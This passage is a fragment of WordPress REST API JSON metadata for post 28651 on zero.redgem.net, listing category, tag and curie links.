a&parent=28651"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=28651"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=28651"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}